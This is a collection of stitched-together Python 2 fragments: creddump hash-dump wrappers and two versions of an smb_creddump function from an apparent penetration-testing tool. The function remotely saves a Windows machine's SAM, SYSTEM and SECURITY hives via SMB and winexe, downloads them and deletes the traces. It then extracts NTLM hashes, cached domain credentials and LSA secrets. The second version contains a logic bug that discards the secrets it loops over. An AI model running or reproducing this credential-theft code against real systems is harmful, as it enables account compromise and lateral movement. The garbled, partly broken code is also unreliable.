# # creddump is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # creddump is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with creddump. If not, see <http://www.gnu.org/licenses/>. """ @author: Brendan Dolan-Gavitt @license: GNU General Public License 2.0 or later @contact: [email protected] """ import sys from framework.win32.domcachedump import dump_file_hashes if len(sys.argv) < 3: print "usage: %s bootkey <security hive>" % sys.argv[0] sys.exit(1) dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2])
def smb_creddump(): """ [-s] <ip> [ user ] [ passwd/nthash ] Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets """ try: sys.path.insert(0, BASEDIR + '/creddump') from framework.win32 import hashdump, domcachedump, lsasecrets except: text("[!] Error: Creddump dependency missing.", 1) set_creds(3) text("[*] Extracting hives...") tmpfile = '/tmp/cred_run.bat' bat = ['@echo off', 'cd \\windows\\temp', 'reg save HKLM\\SAM sam.hive /y', 'reg save HKLM\\SYSTEM system.hive /y', 'reg save HKLM\\SECURITY security.hive /y'] open(tmpfile, 'w').write('\r\n'.join(bat)) smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile) print winexe('\\windows\\temp\\cred_run.bat') text("[*] Downloading hives...") smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip']) smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip']) smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip']) text("[*] Removing temp files...") smbclient('del "\\windows\\temp\\cred_run.bat"') smbclient('del "\\windows\\temp\\sam.hive"') smbclient('del "\\windows\\temp\\system.hive"') smbclient('del "\\windows\\temp\\security.hive"') os.unlink(tmpfile) text("[*] Extracting SAM credentials...") hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive') text("[*] Extracting MSCASH credentials...") domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive') # Code below ripped from creddump's lsadump.py text("[*] Extracting LSA Secrets...") try: FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) secrets = lsasecrets.get_file_secrets(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive') if not secrets: text("[!] Unable to read LSA secrets.") else: for k in secrets: N = 0 length = 16 result = '' while secrets[k]: s, secrets[k] = secrets[k][:length],secrets[k][length:] hexa = ' '.join(["%02X" % ord(x) for x in s]) s = s.translate(FILTER) result += "%04X %-*s %s\n" % (N, length*3, hexa, s) N += length print k print result except: pass text("[*] SYSTEM, SAM and SECURITY hives were saved in the current directory.")
# You should have received a copy of the GNU General Public License # along with creddump. If not, see <http://www.gnu.org/licenses/>. """ @author: Brendan Dolan-Gavitt @license: GNU General Public License 2.0 or later @contact: [email protected] """ import sys from framework.win32.domcachedump import dump_file_hashes def showUsage(): print "usage: %s <system hive> <security hive> <Vista/7>" % sys.argv[0] print "\nExample (Windows Vista/7):" print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0] print "\nExample (Windows XP):" print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0] if len(sys.argv) < 4: showUsage() sys.exit(1) if sys.argv[3] not in ["true", "false"]: showUsage() sys.exit(1) vista = True if sys.argv[3] == "true" else False dump_file_hashes(sys.argv[1], sys.argv[2], sys.argv[3])
def smb_creddump(): """ [-s] <ip/file/range> [ user ] [ passwd/nthash ] Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets """ try: sys.path.insert(0, BASEDIR + '/creddump') from framework.win32 import hashdump, domcachedump, lsasecrets except: text("[!] Error: Creddump dependency missing.", 1) set_creds(3) text("[*] %s Extracting hives..." % (CONF["smb_ip"])) tmpfile = '/tmp/cred_run.%s.bat' % (CONF["smb_ip"]) bat = [ '@echo off', 'cd \\windows\\temp', 'reg save HKLM\\SAM sam.hive /y', 'reg save HKLM\\SYSTEM system.hive /y', 'reg save HKLM\\SECURITY security.hive /y' ] open(tmpfile, 'w').write('\r\n'.join(bat)) smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile) text("[*] %s Running cred_run.bat\n%s\n" % (CONF["smb_ip"], winexe('\\windows\\temp\\cred_run.bat'))) text("[*] %s Downloading hives..." % (CONF["smb_ip"])) smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip']) smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip']) smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip']) text("[*] %s Removing temp files..." % (CONF["smb_ip"])) smbclient('del "\\windows\\temp\\cred_run.bat"') smbclient('del "\\windows\\temp\\sam.hive"') smbclient('del "\\windows\\temp\\system.hive"') smbclient('del "\\windows\\temp\\security.hive"') os.unlink(tmpfile) text("[*] %s Extracting SAM credentials..." % (CONF["smb_ip"])) hashes = hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive') text("[*] %s Extracting MSCASH credentials..." % (CONF["smb_ip"])) mscash = domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive') text("[*] %s SAM hashes\n%s" % (CONF["smb_ip"], "\n".join(hashes))) text("[*] %s MsCash\n%s" % (CONF["smb_ip"], "\n".join(mscash))) # Code below ripped from creddump's lsadump.py text("[*] %s Extracting LSA Secrets..." % (CONF["smb_ip"])) try: FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)]) secrets = lsasecrets.get_file_secrets( CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive') if not secrets: text("[!] %s Error(smb_creddump): Unable to read LSA secrets." % (CONF["smb_ip"])) else: secrets = [] for k in secrets: N = 0 length = 16 result = '' while secrets[k]: s, secrets[k] = secrets[k][:length], secrets[k][length:] hexa = ' '.join(["%02X" % ord(x) for x in s]) s = s.translate(FILTER) result += "%04X %-*s %s\n" % (N, length * 3, hexa, s) N += length secrets.append(k) secrets.append(result) text("[*] %s LSA Secrets\n%s" % (CONF["smb_ip"], "\n".join(secrets))) except: pass text( "[*] %s SYSTEM, SAM and SECURITY hives were saved in the current directory." % (CONF["smb_ip"]))